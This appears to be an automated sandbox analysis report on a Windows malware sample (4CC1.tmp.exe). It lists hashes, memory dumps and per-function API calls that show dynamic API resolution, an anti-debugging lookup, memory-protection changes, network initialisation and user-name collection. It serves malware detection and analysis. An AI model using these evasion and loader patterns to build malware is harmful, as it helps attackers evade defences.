Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Function 0249B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02472AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02472AAD,00000000), ref: 0249B187
GetLastError.KERNEL32 ref: 0249B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02472AAD,00000000), ref: 0249B1F0

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: c066610513b409a7f41cbeb56effab23d5d1aa2c42a6952ac498485592969778
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 8B41F631604216AFCF21CFA9EC48BBF7FA5EF41758F14416BE8599B2A0DB708901CB60

Analysis Process: 4CC1.tmp.exePID: 3628, Parent PID: 2060COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	7%
Signature Coverage:	15.9%
Total number of Nodes:	1535
Total number of Limit Nodes:	36

Executed Functions

Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0040602F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163

Strings

------, xrefs: 00406289, 004062B6, 0040652E, 0040661F
", xrefs: 004065C7, 004066B5

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8

Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6

Strings

------, xrefs: 00404E0C, 00404E39, 004050BB, 004051AC
", xrefs: 00405154, 00405242

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
LdrInitializeThunk.NTDLL ref: 00404A4F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040498F, 00404996, 0040499D, 004049A4, 004049AB, 004049CA, 004049D4, 004049DB, 004049E2, 004049E9, 004049F0, 004049FB, 00404A02, 00404A09, 00404A10, 00404A26, 00404A2D, 00404A34, 00404A3B, 00404A42, 00404A63, 00404A75, 00404A7C, 00404A83, 00404A8A, 00404A9A, 00404AA1, 00404AA8, 00404AAF, 00404AB6

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2971326882-3329630956
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

Function 004263C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,008E9D18), ref: 00426419
GetProcAddress.KERNEL32(75550000,008E9CE8), ref: 00426432
GetProcAddress.KERNEL32(75550000,008E9D78), ref: 0042644A
GetProcAddress.KERNEL32(75550000,008E9D48), ref: 00426462
GetProcAddress.KERNEL32(75550000,00908180), ref: 0042647B
GetProcAddress.KERNEL32(75550000,008E2E38), ref: 00426493
GetProcAddress.KERNEL32(75550000,008E3158), ref: 004264AB
GetProcAddress.KERNEL32(75550000,008E9D30), ref: 004264C4
GetProcAddress.KERNEL32(75550000,008E9D90), ref: 004264DC
GetProcAddress.KERNEL32(75550000,009084D8), ref: 004264F4
GetProcAddress.KERNEL32(75550000,00908700), ref: 0042650D
GetProcAddress.KERNEL32(75550000,008E2EF8), ref: 00426525
GetProcAddress.KERNEL32(75550000,009086A0), ref: 0042653D
GetProcAddress.KERNEL32(75550000,00908658), ref: 00426556
GetProcAddress.KERNEL32(75550000,008E2FB8), ref: 0042656E
GetProcAddress.KERNEL32(75550000,00908478), ref: 00426586
GetProcAddress.KERNEL32(75550000,00908490), ref: 0042659F
GetProcAddress.KERNEL32(75550000,008E30B8), ref: 004265B7
GetProcAddress.KERNEL32(75550000,009085E0), ref: 004265CF
GetProcAddress.KERNEL32(75550000,008E2F58), ref: 004265E8
LoadLibraryA.KERNEL32(009086B8,?,?,?,00421BE3), ref: 004265F9
LoadLibraryA.KERNEL32(00908628,?,?,?,00421BE3), ref: 0042660B
LoadLibraryA.KERNEL32(00908760,?,?,?,00421BE3), ref: 0042661D
LoadLibraryA.KERNEL32(00908598,?,?,?,00421BE3), ref: 0042662E
LoadLibraryA.KERNEL32(009084A8,?,?,?,00421BE3), ref: 00426640
GetProcAddress.KERNEL32(75670000,009085B0), ref: 0042665D
GetProcAddress.KERNEL32(75750000,00908748), ref: 00426679
GetProcAddress.KERNEL32(75750000,009084F0), ref: 00426691
GetProcAddress.KERNEL32(76BE0000,009084C0), ref: 004266AD
GetProcAddress.KERNEL32(759D0000,008E2DF8), ref: 004266C9
GetProcAddress.KERNEL32(773F0000,00908250), ref: 004266E5
GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004266FC

Strings

NtQueryInformationProcess, xrefs: 004266F1

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0

Function 004229E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
HeapAlloc.KERNEL32(00000000), ref: 00422A16
GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

Function 00426710 Relevance: 214.2, APIs: 115, Strings: 7, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75550000,008E2EB8), ref: 00426725
GetProcAddress.KERNEL32(75550000,008E2FD8), ref: 0042673D
GetProcAddress.KERNEL32(75550000,00908730), ref: 00426756
GetProcAddress.KERNEL32(75550000,00908790), ref: 0042676E
GetProcAddress.KERNEL32(75550000,009087C0), ref: 00426786
GetProcAddress.KERNEL32(75550000,00908820), ref: 0042679F
GetProcAddress.KERNEL32(75550000,0090B040), ref: 004267B7
GetProcAddress.KERNEL32(75550000,00908778), ref: 004267CF
GetProcAddress.KERNEL32(75550000,009087A8), ref: 004267E8
GetProcAddress.KERNEL32(75550000,009087D8), ref: 00426800
GetProcAddress.KERNEL32(75550000,009087F0), ref: 00426818
GetProcAddress.KERNEL32(75550000,008E2ED8), ref: 00426831
GetProcAddress.KERNEL32(75550000,008E2DB8), ref: 00426849
GetProcAddress.KERNEL32(75550000,008E2FF8), ref: 00426861
GetProcAddress.KERNEL32(75550000,008E30F8), ref: 0042687A
GetProcAddress.KERNEL32(75550000,00908808), ref: 00426892
GetProcAddress.KERNEL32(75550000,0090E5E8), ref: 004268AA
GetProcAddress.KERNEL32(75550000,0090B180), ref: 004268C3
GetProcAddress.KERNEL32(75550000,008E3018), ref: 004268DB
GetProcAddress.KERNEL32(75550000,0090E4E0), ref: 004268F3
GetProcAddress.KERNEL32(75550000,0090E4C8), ref: 0042690C
GetProcAddress.KERNEL32(75550000,0090E390), ref: 00426924
GetProcAddress.KERNEL32(75550000,0090E3A8), ref: 0042693C
GetProcAddress.KERNEL32(75550000,008E3058), ref: 00426955
GetProcAddress.KERNEL32(75550000,0090E498), ref: 0042696D
GetProcAddress.KERNEL32(75550000,0090E540), ref: 00426985
GetProcAddress.KERNEL32(75550000,0090E360), ref: 0042699E
GetProcAddress.KERNEL32(75550000,0090E378), ref: 004269B6
GetProcAddress.KERNEL32(75550000,0090E3F0), ref: 004269CE
GetProcAddress.KERNEL32(75550000,0090E330), ref: 004269E7
GetProcAddress.KERNEL32(75550000,0090E4F8), ref: 004269FF
GetProcAddress.KERNEL32(75550000,0090E3C0), ref: 00426A17
GetProcAddress.KERNEL32(75550000,0090E3D8), ref: 00426A30
GetProcAddress.KERNEL32(75550000,0090A8C8), ref: 00426A48
GetProcAddress.KERNEL32(75550000,0090E510), ref: 00426A60
GetProcAddress.KERNEL32(75550000,0090E570), ref: 00426A79
GetProcAddress.KERNEL32(75550000,008E3038), ref: 00426A91
GetProcAddress.KERNEL32(75550000,0090E348), ref: 00426AA9
GetProcAddress.KERNEL32(75550000,008E3078), ref: 00426AC2
GetProcAddress.KERNEL32(75550000,0090E408), ref: 00426ADA
GetProcAddress.KERNEL32(75550000,0090E420), ref: 00426AF2
GetProcAddress.KERNEL32(75550000,008E3098), ref: 00426B0B
GetProcAddress.KERNEL32(75550000,008E3118), ref: 00426B23
LoadLibraryA.KERNEL32(0090E528,0042067A), ref: 00426B35
LoadLibraryA.KERNEL32(0090E618), ref: 00426B46
LoadLibraryA.KERNEL32(0090E558), ref: 00426B58
LoadLibraryA.KERNEL32(0090E4B0), ref: 00426B6A
LoadLibraryA.KERNEL32(0090E438), ref: 00426B7B
LoadLibraryA.KERNEL32(0090E480), ref: 00426B8D
LoadLibraryA.KERNEL32(0090E450), ref: 00426B9F
LoadLibraryA.KERNEL32(0090E468), ref: 00426BB0
GetProcAddress.KERNEL32(75750000,008E3138), ref: 00426BCC
GetProcAddress.KERNEL32(75750000,0090E588), ref: 00426BE4
GetProcAddress.KERNEL32(75750000,00908220), ref: 00426BFD
GetProcAddress.KERNEL32(75750000,0090E5A0), ref: 00426C15
GetProcAddress.KERNEL32(75750000,008E3298), ref: 00426C2D
GetProcAddress.KERNEL32(740A0000,0090AF50), ref: 00426C4D
GetProcAddress.KERNEL32(740A0000,008E3458), ref: 00426C65
GetProcAddress.KERNEL32(740A0000,0090AAA0), ref: 00426C7E
GetProcAddress.KERNEL32(740A0000,0090E5B8), ref: 00426C96
GetProcAddress.KERNEL32(740A0000,0090E5D0), ref: 00426CAE
GetProcAddress.KERNEL32(740A0000,008E32D8), ref: 00426CC7
GetProcAddress.KERNEL32(740A0000,008E3218), ref: 00426CDF
GetProcAddress.KERNEL32(740A0000,0090E600), ref: 00426CF7
GetProcAddress.KERNEL32(757E0000,008E32F8), ref: 00426D13
GetProcAddress.KERNEL32(757E0000,008E3498), ref: 00426D2B
GetProcAddress.KERNEL32(757E0000,0090E690), ref: 00426D44
GetProcAddress.KERNEL32(757E0000,0090E6A8), ref: 00426D5C
GetProcAddress.KERNEL32(757E0000,008E3538), ref: 00426D74
GetProcAddress.KERNEL32(758D0000,0090AB90), ref: 00426D94
